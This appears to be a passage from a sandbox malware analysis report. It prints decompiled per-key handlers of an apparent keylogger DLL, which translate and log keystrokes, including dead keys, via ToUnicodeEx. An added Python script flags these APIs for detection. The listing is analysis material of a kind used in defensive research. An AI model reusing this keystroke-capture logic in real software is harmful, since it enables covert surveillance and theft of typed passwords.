                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Process]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
			}

                  0x100072aa
                  0x100072aa
                  0x100072b1
                  0x100076f0
                  0x100076f5
                  0x10007727
                  0x10007727
                  0x10007731
                  0x10007759
                  0x1000775d
                  0x1000780e
                  0x10007810
                  0x10007816
                  0x1000781f
                  0x10007836
                  0x10007838
                  0x10007839
                  0x10007845
                  0x1000784e
                  0x10007853
                  0x10007855
                  0x10007857
                  0x10007879
                  0x10007880
                  0x10007880
                  0x10007857
                  0x10007855
                  0x10007763
                  0x10007774
                  0x10007776
                  0x1000777b
                  0x10007780
                  0x1000778f
                  0x10007794
                  0x10007798
                  0x100077be
                  0x100077cb
                  0x1000779a
                  0x100077a2
                  0x100077af
                  0x100077af
                  0x10007798
                  0x100077d0
                  0x100077d6
                  0x100077d8
                  0x100077f8
                  0x100077f8
                  0x10007807
                  0x10007807
                  0x1000788b
                  0x10007890
                  0x10007894
                  0x10007894
                  0x1000789b
                  0x1000789e
                  0x100078a1
                  0x100078b6

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Process]
                  • API String ID: 783433895-2206852380
                  • Opcode ID: 9cc73bee2c5c66c45c57059d7ed4abb569be2cba4b687590c36e796b9dc273c7
                  • Instruction ID: 542da9702f65af167a2acd74eee3d938ae924f742fa8779219d2eac7aa9adbbf
                  • Opcode Fuzzy Hash: 9cc73bee2c5c66c45c57059d7ed4abb569be2cba4b687590c36e796b9dc273c7
                  • Instruction Fuzzy Hash: 3431C2B8F042545BF722C7658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45C761
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100072CC(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Select]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
			}

                  0x100072cc
                  0x100072cc
                  0x100072d3
                  0x100076f0
                  0x100076f5
                  0x10007727
                  0x10007727
                  0x10007731
                  0x10007759
                  0x1000775d
                  0x1000780e
                  0x10007810
                  0x10007816
                  0x1000781f
                  0x10007836
                  0x10007838
                  0x10007839
                  0x10007845
                  0x1000784e
                  0x10007853
                  0x10007855
                  0x10007857
                  0x10007879
                  0x10007880
                  0x10007880
                  0x10007857
                  0x10007855
                  0x10007763
                  0x10007774
                  0x10007776
                  0x1000777b
                  0x10007780
                  0x1000778f
                  0x10007794
                  0x10007798
                  0x100077be
                  0x100077cb
                  0x1000779a
                  0x100077a2
                  0x100077af
                  0x100077af
                  0x10007798
                  0x100077d0
                  0x100077d6
                  0x100077d8
                  0x100077f8
                  0x100077f8
                  0x10007807
                  0x10007807
                  0x1000788b
                  0x10007890
                  0x10007894
                  0x10007894
                  0x1000789b
                  0x1000789e
                  0x100078a1
                  0x100078b6

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Select]
                  • API String ID: 783433895-2413838692
                  • Opcode ID: 514ff3e34b14a9e5d8ab413587dce2c2f410968874725fa2580441ff6d415804
                  • Instruction ID: a17747a1b3028d12c7a4f27126b47fc81b0c71295ef6cb46dcdf9e05795c8619
                  • Opcode Fuzzy Hash: 514ff3e34b14a9e5d8ab413587dce2c2f410968874725fa2580441ff6d415804
                  • Instruction Fuzzy Hash: 1E31C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100072DD(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Separator]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
			}

                  0x100072dd
                  0x100072dd
                  0x100072e4
                  0x100076f0
                  0x100076f5
                  0x10007727
                  0x10007727
                  0x10007731
                  0x10007759
                  0x1000775d
                  0x1000780e
                  0x10007810
                  0x10007816
                  0x1000781f
                  0x10007836
                  0x10007838
                  0x10007839
                  0x10007845
                  0x1000784e
                  0x10007853
                  0x10007855
                  0x10007857
                  0x10007879
                  0x10007880
                  0x10007880
                  0x10007857
                  0x10007855
                  0x10007763
                  0x10007774
                  0x10007776
                  0x1000777b
                  0x10007780
                  0x1000778f
                  0x10007794
                  0x10007798
                  0x100077be
                  0x100077cb
                  0x1000779a
                  0x100077a2
                  0x100077af
                  0x100077af
                  0x10007798
                  0x100077d0
                  0x100077d6
                  0x100077d8
                  0x100077f8
                  0x100077f8
                  0x10007807
                  0x10007807
                  0x1000788b
                  0x10007890
                  0x10007894
                  0x10007894
                  0x1000789b
                  0x1000789e
                  0x100078a1
                  0x100078b6

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Separator]
                  • API String ID: 783433895-3494163826
                  • Opcode ID: b28f82d1315a21c0ec3eeca5f420e7cb8781b37bf75afc05d08b2ace6efbe94e
                  • Instruction ID: 4579c8cabb46fc9fc98fa56ae242cb9821b75e5cae476442ada672dc186bafb3
                  • Opcode Fuzzy Hash: b28f82d1315a21c0ec3eeca5f420e7cb8781b37bf75afc05d08b2ace6efbe94e
                  • Instruction Fuzzy Hash: A831C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%
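The per-key handlers in this section all follow the same shape: append a readable label such as "[Numpad -]" or "[Tab]" to the log string, translate the hooked virtual key with ToUnicodeEx against the active keyboard layout, and, when ToUnicodeEx reports a dead key (return value -1), stash the key and keyboard state in globals and flush the pending dead-key state by pushing VK_DECIMAL (0x6E, mapped to a scan code with MapVirtualKeyW(…, MAPVK_VK_TO_VSC)) through ToUnicodeEx until it stops returning -1. That API combination is what an analyst looks for when triaging many functions of a dump. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses the "APIs" and "Memory Dump Source" lines in the format shown on this page, flags the keystroke-translation APIs and the VK_DECIMAL flush idiom, and decodes the .sdmp file name. The sample lines are copied from the listing above; the indicator heuristic is my own, and the reading of the .sdmp name fields (base address, PAGE_* protection, MEM_* type; the first three fields kept opaque) is an assumption, since the report does not document the naming scheme.

```python
"""Parse the 'APIs' and 'Memory Dump Source' lines of a Joe Sandbox function
listing and flag keystroke-translation API usage. Sample lines are copied from
the report on this page; field meanings marked ASSUMPTION are not documented there."""
import re
from dataclasses import dataclass

# "ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754"
API_RE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
# "00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp"
DUMP_RE = re.compile(
    r"(?P<proc>\d+)\.(?P<stage>\d+)\.(?P<uid>\d+)\.(?P<base>[0-9A-Fa-f]{16})"
    r"\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<kind>[0-9A-Fa-f]{8})\.sdmp")

PAGE_PROTECT = {  # winnt.h PAGE_* values
    0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
VK_DECIMAL, MAPVK_VK_TO_VSC = 0x6E, 1  # winuser.h
TRANSLATE_APIS = {"ToUnicode", "ToUnicodeEx", "ToAscii", "ToAsciiEx"}
MAP_APIS = {"MapVirtualKeyA", "MapVirtualKeyW", "MapVirtualKeyExA", "MapVirtualKeyExW"}

# Constructed input: the APIs block of E100072FF, copied from the report.
SAMPLE_API_LINES = [
    "• Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2",
    "• ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754",
    "• ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8",
    "• MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E",
    "• MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871",
    "• ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879",
]
SAMPLE_DUMP_LINE = ("• Source File: 00000000.00000002.296449823.0000000010001000."
                    "00000080.00020000.sdmp, Offset: 10000000, based on PE: true")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list      # raw hex strings; "?" means the analyser could not resolve the value
    ref: int        # call-site address
    subcall: bool   # reported as "Part of subcall function ..."


def parse_api_lines(lines):
    """Return one ApiCall per report line that matches the APIs format."""
    calls = []
    for line in lines:
        m = API_RE.search(line)
        if not m:
            continue
        raw = m["args"].strip()
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16),
                             "Part of subcall function" in line))
    return calls


def arg_value(arg):
    """Hex argument text -> int, or None for the '?' placeholder."""
    return None if arg == "?" else int(arg, 16)


def keylogger_indicators(calls):
    """Heuristics (my own) for the keystroke-to-text translation seen in the listing."""
    apis = {c.api for c in calls}
    found = []
    if apis & TRANSLATE_APIS:
        found.append("virtual-key to text translation")
    if apis & MAP_APIS:
        found.append("virtual-key / scan-code mapping")
    # MapVirtualKey(VK_DECIMAL, MAPVK_VK_TO_VSC) next to ToUnicodeEx is the dead-key
    # flush loop at 0x10007879 in the listing.
    if apis & TRANSLATE_APIS and any(
            c.api in MAP_APIS and len(c.args) >= 2
            and arg_value(c.args[0]) == VK_DECIMAL
            and arg_value(c.args[1]) == MAPVK_VK_TO_VSC for c in calls):
        found.append("dead-key flush via VK_DECIMAL")
    return found


def parse_dump_source(line):
    """Decode a .sdmp file name. ASSUMPTION: fields 4-6 are the region's base
    address, PAGE_* protection and MEM_* type; fields 1-3 are kept opaque."""
    m = DUMP_RE.search(line)
    if not m:
        raise ValueError("no .sdmp name in line")
    prot, kind = int(m["prot"], 16), int(m["kind"], 16)
    return {
        "process_index": int(m["proc"]), "stage": int(m["stage"]), "uid": m["uid"],
        "base": int(m["base"], 16),
        "protect": PAGE_PROTECT.get(prot, hex(prot)),
        "mem_type": MEM_TYPE.get(kind, hex(kind)),
        "executable": bool(prot & 0xF0),
        "writable": prot in (0x04, 0x08, 0x40, 0x80),
    }


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_API_LINES)
    for c in calls:
        tag = " [subcall]" if c.subcall else ""
        print(f"{c.ref:08x} {c.module}!{c.api}({', '.join(c.args)}){tag}")
    print("indicators:", keylogger_indicators(calls))
    print("dump:", parse_dump_source(SAMPLE_DUMP_LINE))
```

Running it on the six lines above yields all three indicators; the dump name decodes to a 0x10001000 region with PAGE_EXECUTE_WRITECOPY protection, consistent with the code section of a module based at 0x10000000. The heuristic deliberately requires a translation API next to the VK_DECIMAL mapping: MapVirtualKey alone is common in benign input handling.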

                  C-Code - Quality: 80%
                  			E100072FF(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Numpad -]");	// append this key's readable label to the log string (WideString concat, see SysReAllocStringLen in APIs below)
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				// Translate the hooked key (virtual key and scan code passed at _t118+0xc / +0x10) using the
                  				// 256-byte keyboard state at _t118-0x101 and the layout handle in edi. ToUnicodeEx returns the
                  				// number of characters written, 0 for no translation, or -1 for a dead key (an accent that
                  				// only produces output together with the next keystroke).
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						// Dead key: save its virtual key, scan code and keyboard state (0x40 << 2 = 256 bytes)
                  						// in globals so the next keystroke can be logged together with it.
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);	// 0x6e = VK_DECIMAL, 1 = MAPVK_VK_TO_VSC
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							// The translation above left the dead key pending in the keyboard buffer; feed
                  							// VK_DECIMAL through ToUnicodeEx until it stops returning -1 to flush that state.
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					// The key produced text: reload the saved dead-key context (2 dwords + 256-byte state,
                  					// 0x42 << 2 = 264 bytes) and build the log entry from it.
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						// A dead key was saved earlier: push it through ToUnicodeEx again with its saved scan code.
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				// try/finally epilogue (Delphi-style): restore the exception handler chain at fs:[0] and run the cleanup routine.
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}














                  • Address column (detached from the listing above by extraction): the handler enters at 0x100072ff, spends its first bytes (0x100072ff..0x10007306) setting up the key label, then continues at 0x100076f0 in the body shared by the neighbouring key handlers, ending at 0x100078b6.

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Numpad -]
                  • API String ID: 783433895-3603678833
                  • Opcode ID: f727318df62ab6984be34b48274f61689c13b89c74ec8ef95ab27e6241858d3f
                  • Instruction ID: b676ca2d17fe351d24fe2de8df4d6e9bb7385714fcd3c7b893a6d02882ec396e
                  • Opcode Fuzzy Hash: f727318df62ab6984be34b48274f61689c13b89c74ec8ef95ab27e6241858d3f
                  • Instruction Fuzzy Hash: D031C2B8F042545BF722C7658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45C761
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007310(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Tab]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
